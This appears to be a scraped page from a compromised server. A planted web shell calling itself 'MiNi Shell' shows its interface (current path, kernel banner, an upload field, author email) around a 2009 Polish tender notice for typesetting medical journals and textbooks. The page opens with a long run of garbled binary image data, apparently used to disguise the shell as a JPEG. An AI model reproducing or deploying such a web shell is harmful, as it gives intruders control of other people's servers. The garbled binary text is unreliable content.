JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090330/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090330/82608-N-2009.html

<p class="kh_header"><b>Wrocław: AM/AZ/PN-48/09 Usługa:Opracowanie typograficzne, w zakresie wykonania składu 
drukarskiego czasopism (część A).Advances in Clinical and Experimental Medicine i Dental and Medical Problems
oraz składu drukarskiego podręczników (część B zamówienia).</b><br>
<b>Numer ogłoszenia: 82608 - 2009; data zamieszczenia: 30.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Medyczna im. Piastów Śląskich , ul. Pasteura 1, 50-537 Wrocław, woj. dolnośląskie, tel. (071) 784 00 44; 784-11-73, faks (071) 784 00 45.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.am.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> AM/AZ/PN-48/09 Usługa:Opracowanie typograficzne, w zakresie wykonania składu 
drukarskiego czasopism (część A).Advances in Clinical and Experimental Medicine i Dental and Medical Problems
oraz składu drukarskiego podręczników (część B zamówienia)..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA

1.	Przedmiotem zamówienia jest opracowanie typograficzne, związane z wykonaniem składu drukarskiego czasopism (A)Advances in Clinical and Experimental Medicine, i Dental and Medical Problems oraz podręczników (B), określonych jako części A i B, które oceniane będą łącznie jako jedno zamówienie. Zamawiający nie dopuszcza składania ofert częściowych, na część A lub B. Przedstawione poniżej rodzaje i liczba planowanych publikacji określone zostały na podstawie zamówień udzielonych w ciągu ostatnich 2 lat, ale Zamawiający zastrzega możliwość wprowadzania zmian podczas realizacji niniejszego zamówienia w granicach ? 20% planowanego zamówienia, w części A i B

Część A/ czasopisma medyczne Advances in Clinical and Experimental Medicine i Dental and Medical Problems - rocznie około 10 zeszytów;
ok. 230 ark. drukarskich, dla formatu A4

Wykonanie dotyczy: Przepisania maszynopisów (głównie w j. angielskim) lub konwersji tekstu z dostarczonych dyskietek, skanowania ilustracji, rysowania i poprawiania rycin, wprowadzenia poprawek redakcyjnych, I i II korekty, przygotowania do naświetlania z rozdzieleniem na kolory i wydruku na kalce w lustrzanym odbiciu.
Skład dwuszpaltowy z licznymi śródtytułami, włamywanymi tabelami i rycinami. 
Redakcja techniczna musi być zgodna z przyjętym i zatwierdzonym układem typograficznym czasopism.

Wykonawca jest zobowiązany do odebrania materiałów (w tym maszynopisów) z Działu Wydawnictw AM oraz dostarczenia korekt i gotowych kalek do sprawdzenia oraz akceptacji przez Dział Wydawnictw AM; Podczas opracowywania składu drukarskiego. Konieczny jest stały kontakt Wykonawcy z Redakcją opracowywanej publikacji. 
		
Część B/ Podręczniki rocznie ok. 6 poz., 90 ark. drukarskich/ format B5 

Wykonanie dotyczy: Opracowania typograficznego, profesjonalnego projektu okładki, przepisania maszynopisów lub konwersji tekstu z dostarczonych dyskietek, skanowania ilustracji, rysowania i poprawiania rycin, wprowadzenia poprawek redakcyjnych, I i II korekty, przygotowania do naświetlania z rozdzieleniem na kolory i wydruku na kalce, poprawy wydruków impozycyjnych i kalek w lustrzanym odbiciu.

Wykonawca jest zobowiązany do odebrania materiałów do składu (w tym maszynopisów) z działu Wydawnictw AM oraz do dostarczenia projektu typograficznego, projektu okładki, korekt i gotowych kalek, druków impozycyjnych w celu sprawdzenia i akceptacji materiału opracowanego do druku, przez Dział Wydawnictw AM.

2.	Dostawa opracowań typograficznych do Zamawiającego, co nastąpi każdorazowo w terminie zadeklarowanym przez Wykonawcę w formularzu ofertowym, po złożeniu pisemnego zamówienia przez Zamawiającego (listownie bądź faksem).
3.	W składanych zamówieniach, Zamawiający określi: nazwę publikacji, ilość i rodzaje przekazanych materiałów oraz sposób opracowania składu
4.	Zamówione opracowania dostarczane będą do Działu Wydawnictw Uczelnianych AM, mieszczącego się w budynku przy ul. Chałubińskiego 6a, we Wrocławiu.
5.	Wykonawca złoży wraz z ofertą wzór publikacji opracowanej typograficznie przez Wykonawcę (okładka autorstwa Wykonawcy), do oceny jakościowej, zgodnie z przyjętym kryterium Siwz (Rozdz. III pkt.5.).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.82.20.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> W postępowaniu AM/AZ/PN-48/09 nie wymaga się złożenia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	Z postępowania o udzielenie niniejszego zamówienia wyklucza się (w oparciu o art. 24 ust.1 prawa zamówień publicznych):
a.	wykonawców, którzy wyrządzili szkodę, nie wykonując zamówienia lub wykonując je nienależycie, jeżeli szkoda ta została stwierdzona prawomocnym orzeczeniem sądu wydanym w okresie 3 lat przez wszczęciem postępowania;
b.	wykonawców, w stosunku do których otwarto likwidację, lub których upadłość ogłoszono.
c.	wykonawców, którzy zalegają z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne, z wyjątkiem przypadków, gdy uzyskali oni przewidziane prawem zwolnienie, odroczenie, rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
d.	osoby fizyczne, które prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych;
e.	spółki jawne, których wspólnika prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych;
f.	spółki partnerskie, których partnera lub członka zarządu prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych;
g.	spółki komandytowe oraz spółki komandytowo- akcyjne, których komplementariusza prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych;
h.	osoby prawne, których urzędującego członka organu zarządzającego prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych;
i.	podmioty zbiorowe, wobec których sąd orzekł zakaz ubiegania się o zamówienia, na podstawie przepisów o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary; 
j.	wykonawców, którzy nie spełniają warunków udziału w postępowaniu, o których mowa w art. 22 ust.1 pkt.1- 3. Pzp.
2.	Z postępowania o udzielenie zamówienia wyklucza się również (w oparciu o art.24 ust.2 prawa zamówień publicznych) wykonawców, którzy:
a.	wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania, lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności, chyba że udział tych wykonawców w postępowaniu nie utrudni uczciwej konkurencji.
b.	złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania;
c.	nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy, z zastrzeżeniem art.26 ust. 3 i 4 ;
d.	nie zgodzili się na przedłużenie okresu związania ofertą.

3.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki określone w art.22 ust.1 prawa zamówień publicznych tj.:
a)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
b)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
c)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
d)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> WYKAZ OŚWIADCZEŃ I DOKUMENTÓW, SKŁADAJĄCYCH SIĘ NA OFERTĘ
W POSTĘPOWANIU 

a.	Załącznik nr 1 - Formularz ofertowy zawierający informację o cenie przedmiotu zamówienia i zadeklarowane przez Wykonawcę terminy wykonania wraz ze wzorem publikacji dla części A i B - wzór załącznik nr 1 do SIWZ. 
b.	Załącznik nr 2 - Kosztorysu ceny zamówienia określonego w części A i B - wzór załącznik nr2 do SIWZ
c.	Załącznik nr 3 - Akceptacja warunków umownych - na projekcie umowy;- załącznik 3 do SIWZ
d.	Załącznik nr 4 - Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej (w formie czytelnej kserokopii) wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
e.	Załącznik nr 5 -Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia w częściach A i B, w zakresie opracowań typograficznych składu drukarskiego czasopism lub podręczników o nakładzie co najmniej 300 egz., oraz załączenia dokumentów potwierdzających, że te usługi zostały wykonane należycie. - załącznik przygotowany przez Wykonawcę
f.	Załącznik nr 6- Pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów.
g.	Załącznik nr 7 - Wykonawca złoży wraz z ofertą wzór publikacji odpowiadający swoim rodzajem przedmiotowi zamówienia w częściach A i B wykonany przez Wykonawcę, celem jego oceny jakościowej, zgodnie z przyjętymi kryteriami. Ocena projektu typograficznego, rysunków, koloru zdjęć, wykonania składu zgodnie z normami edytorskimi Dowolny może być format i ilości stron prezentowanego wzoru.
h.	Załącznik nr 8 Umowy Spółki cywilnej, jeżeli działalność gospodarcza jest prowadzona w formie Sp. cywilnej, albo umowy regulującej współpracę podmiotów występujących wspólnie, jeżeli ofertę składa Konsorcjum, zawierającą:
-	oświadczenie o solidarnej odpowiedzialności każdego z uczestników konsorcjum wobec Zamawiającego
-	zakres odpowiedzialności podmiotów
-	czas trwania Konsorcjum obejmujący pełny okres realizacji przedmiotu zamówienia
-	wykluczenie możliwości wypowiedzenia umowy Konsorcjum przez któregokolwiek z jego członków do czasu wykonania zamówienia
-	pełnomocnictwo każdego z uczestników Konsorcjum dla Lidera, upoważniające do reprezentowania Konsorcjum w przetargu,
i.	Załącznik nr 9 - Oświadczenie o spełnianiu warunków o których mowa w art. 22 ust. 1 ustawy prawo zamówień publicznych i o nie wykluczeniu Wykonawcy z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1-2 Pzp (wzór przedstawiony w SIWZ);
j.	Załącznik nr 10 wzór oświadczenia, na podstawie art. 96 ust. 4 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (Dz. U. Nr 19, poz. 177 ze zm.), o nieujawnianiu informacji stanowiących tajemnicę przedsiębiorstwa (jeżeli dotyczy)Umowy Spółki cywilnej, jeżeli działalność gospodarcza jest prowadzona w formie Sp. cywilnej, albo umowy regulującej współpracę podmiotów występujących wspólnie, jeżeli ofertę składa Konsorcjum, zawierającą:
-	oświadczenie o solidarnej odpowiedzialności każdego z uczestników konsorcjum wobec Zamawiającego
-	zakres odpowiedzialności podmiotów
-	czas trwania Konsorcjum obejmujący pełny okres realizacji przedmiotu zamówienia
-	wykluczenie możliwości wypowiedzenia umowy Konsorcjum przez któregokolwiek z jego członków do czasu wykonania zamówienia
-	pełnomocnictwo każdego z uczestników Konsorcjum dla Lidera, upoważniające do reprezentowania Konsorcjum w przetargu,
dokumenty wymienione w pkt. d i h składa każdy z uczestników Konsorcjum
2.	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu wymienionego w zał. 4 składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: nie otwarto jego likwidacji ani nie ogłoszono upadłości ani nie orzeczono wobec niego zakazu ubiegania się o zamówienie; wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt.2 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
4.	Wykonawcy mogą wspólnie ubiegać się o udzielenie niniejszego zamówienia (art. 23.1. Pzp.) wówczas oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Partnerów. Każdy z Partnerów musi udokumentować, że nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1-2 Pzp. i złożyć dokumenty wymienione w zał. 4 i 9 Natomiast dokumenty wymienione w zał. 1, 2, 3, 5, 6, 7, 8 i 10 (jeśli dotyczy)mogą być wspólne i podpisane przez ustanowionego pełnomocnika lub łącznie przez wszystkich Partnerów; Jeżeli oferta wykonawców, o których mowa w art.23 ust. 1, została wybrana, zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych wykonawców.
5.	Ocena spełnienia przez Wykonawcę warunków udziału w postępowaniu będzie dokonana metodą spełnia/nie spełnia/ w oparciu o informacje zawarte w oświadczeniach i dokumentach, jakich żąda Zamawiający, z zastrzeżeniem wykorzystania przepisu art. 26 ust. 3 i ust. 4 Pzp..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 40</li>
<li>2 - Ocena jakościowa wzorów publikacji, dorobek edytorski - 20</li>
<li>3 - Gwarantowany termin wykonania składu i łamania dla 1 publikacji - 20</li>
<li>4 - Gwarantowany termin wykonania I i II korekty dla 1 publikacji - 10</li>
<li>5 - Gwarantowany termin wykonania i poprawy kalek lub druków impozycyjnych - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.am.wroc.pl link przetargi ZZP nr PN-48/09.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.am.wroc.pl link przetargi ZZP nr PN-48/09.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.04.2009 godzina 10:00, miejsce: Zespół ds. Zamówień Publicznych Akademii Medycznej we Wrocławiu 
przy ul. Mikulicza Radeckiego 5 we Wrocławiu, pokój 31 (II piętro). 50-368 Wrocław.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com